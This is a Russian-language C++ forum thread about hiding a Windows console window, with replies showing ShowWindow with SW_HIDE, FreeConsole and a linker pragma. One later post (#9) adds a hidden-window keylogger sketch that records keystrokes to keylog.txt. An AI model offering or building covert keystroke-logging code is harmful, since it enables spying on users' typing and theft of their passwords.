Форум программистов, компьютерный форум CyberForum.ru

С++ для начинающих

Войти
Регистрация
Восстановить пароль
 
Рейтинг: Рейтинг темы: голосов - 53, средняя оценка - 4.98
Dani
1263 / 621 / 50
Регистрация: 11.08.2011
Сообщений: 2,236
Записей в блоге: 2
Завершенные тесты: 1
#1

Можно ли спрятать консоль в C++, и если да, то как? - C++

28.08.2011, 12:17. Просмотров 6856. Ответов 9
Метки нет (Все метки)

Можно-ли спрятать консоль в с++, если да, то как?
(спрятать - чтобы она не отображалась графически)
А за одно какие для этого подключать библиотеки и какие аргументы в этих функциях.
Similar
Эксперт
41792 / 34177 / 6122
Регистрация: 12.04.2006
Сообщений: 57,940
28.08.2011, 12:17     Можно ли спрятать консоль в C++, и если да, то как?
Посмотрите здесь:

C++ Если дана плитка 3х2, как ее можно разделить на 4 ровные части?
C++ как можно сделать это? если вообще возможно (не задача)
C++ Как можно упростить exp^CA (если вводимые числа 5 и 4)
Выяснить можно ли с поля (k,l) одним ходом ферьзя попасть на поле(m,n). Если нет, то выяснить, как это можно сделать за два хода C++
C++ Создать класс, который определяет можно ли по введенным значениям построить треугольник, и если можно, то какой
C++ Можно ли создать список массива строк и если да, то как?
C++ Можно ли как-то осуществить вывод кириллицы в консоль, не используя Lucida Console
После регистрации реклама в сообщениях будет скрыта и будут доступны все возможности форума.
insolent
 Аватар для insolent
826 / 347 / 15
Регистрация: 30.01.2009
Сообщений: 1,204
28.08.2011, 13:02     Можно ли спрятать консоль в C++, и если да, то как? #2
Dani, если пишешь под винду,в Visual Studio, просто выбери при создании пустой проект "Windows Application" или можно также запустить консольное приложение через другую программу, которая сделает так, что бы окно не показвалось ( SW_HIDE ), например:
C++
1
2
3
4
5
6
7
8
9
10
#include <shellapi.h>
 
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
ShellExecute(0,"open",lpCmdLine,0,0,SW_HIDE);
return 0;
}
Dani
1263 / 621 / 50
Регистрация: 11.08.2011
Сообщений: 2,236
Записей в блоге: 2
Завершенные тесты: 1
29.08.2011, 22:50  [ТС]     Можно ли спрятать консоль в C++, и если да, то как? #3
Нашел такое
C++
1
2
3
4
5
6
#include <windows.h>
using namespace std;
int main()
{
    HWND hWnd = GetConsoleWindow();
    showwindow(hWnd, SW_HIDE);
Но выдает ошибку, на строке инициализации. Не скажите в чем проблема?
Петррр
 Аватар для Петррр
5929 / 3366 / 333
Регистрация: 28.10.2010
Сообщений: 5,926
29.08.2011, 23:47     Можно ли спрятать консоль в C++, и если да, то как? #4
C++
1
2
3
4
5
6
7
8
9
#include <iostream>
#include <windows.h>
 
int main()
{
    HWND hWnd = GetConsoleWindow();
    ShowWindow(hWnd, SW_HIDE);
    system("pause");
}
C++ регистрозависимый.
Dani
1263 / 621 / 50
Регистрация: 11.08.2011
Сообщений: 2,236
Записей в блоге: 2
Завершенные тесты: 1
30.08.2011, 00:17  [ТС]     Можно ли спрятать консоль в C++, и если да, то как? #5
Цитата Сообщение от Петррр Посмотреть сообщение
C++ регистрозависимый.
Да, только все-равно ошибка.
Код
GetConsoleWindow undeclared
Но вродеж поставил #include <windows.h> и using
Петррр
 Аватар для Петррр
5929 / 3366 / 333
Регистрация: 28.10.2010
Сообщений: 5,926
30.08.2011, 00:28     Можно ли спрятать консоль в C++, и если да, то как? #6
Скажите какая ошибка.
insolent
 Аватар для insolent
826 / 347 / 15
Регистрация: 30.01.2009
Сообщений: 1,204
30.08.2011, 02:29     Можно ли спрятать консоль в C++, и если да, то как? #7
Попробуйте в начало добавить
C++
1
#define _WIN32_WINNT 0x0500
Kernel32.lib подключен?
OstapBender
 Аватар для OstapBender
581 / 519 / 35
Регистрация: 22.03.2011
Сообщений: 1,585
30.08.2011, 02:32     Можно ли спрятать консоль в C++, и если да, то как? #8
убрать окошко из которого запущена программа - FreeConsole();
Miwa123
37 / 37 / 1
Регистрация: 16.04.2013
Сообщений: 317
Записей в блоге: 1
17.08.2013, 11:47     Можно ли спрятать консоль в C++, и если да, то как? #9
C++
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#include <iostream>
#include <conio.h>
#include <fstream>
#include <Windows.h>
 
int main()
{
    HWND hWnd = GetConsoleWindow();
    ShowWindow(hWnd, SW_HIDE);
    int c;
    std::ofstream keylog("keylog.txt");
    while((c = getch()) != 8)
    {
        keylog<<c<<" ";
    }
    system("pause");
}
в файл записывается кодировка символов в системе ANSI(во избежание многих проблем). расшифровать легко: в гугле ANSI и изображения. остановка роботы программы происходит когда нажмешь backspace + один любой символ. зайди в корень там создался файлик keylog.txt в нем куча цифр это и будут нажатые клавиши! если что-то непонятно пиши в личку. подскажу!
MoreAnswers
Эксперт
37091 / 29110 / 5898
Регистрация: 17.06.2006
Сообщений: 43,301
24.09.2016, 19:14     Можно ли спрятать консоль в C++, и если да, то как?
Еще ссылки по теме:

C++ Можно ли не показывать (спрятать) консоль?
Можно ли здесь заменить while на for? Если да, то как? C++
C++ Можно ли (и если да, то как) программировать микроконтроллеры на с++?
Можно ли сменить раскладки клавиатуры в программе и если да, то как? C++
C++ Как увеличить максимальное количество символов, которое можно ввести в консоль?

Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
Pavlin27
1 / 1 / 1
Регистрация: 24.09.2016
Сообщений: 6
Завершенные тесты: 1
24.09.2016, 19:14     Можно ли спрятать консоль в C++, и если да, то как? #10
В visual c++ 6 мне помогло:
C++
1
#pragma comment(linker, "/subsystem:windows /ENTRY:mainCRTStartup")
Yandex
Объявления
24.09.2016, 19:14     Можно ли спрятать консоль в C++, и если да, то как?
Ответ Создать тему
Опции темы

Текущее время: 04:28. Часовой пояс GMT +3.
КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin® Version 3.8.9
Copyright ©2000 - 2017, vBulletin Solutions, Inc.
Рейтинг@Mail.ru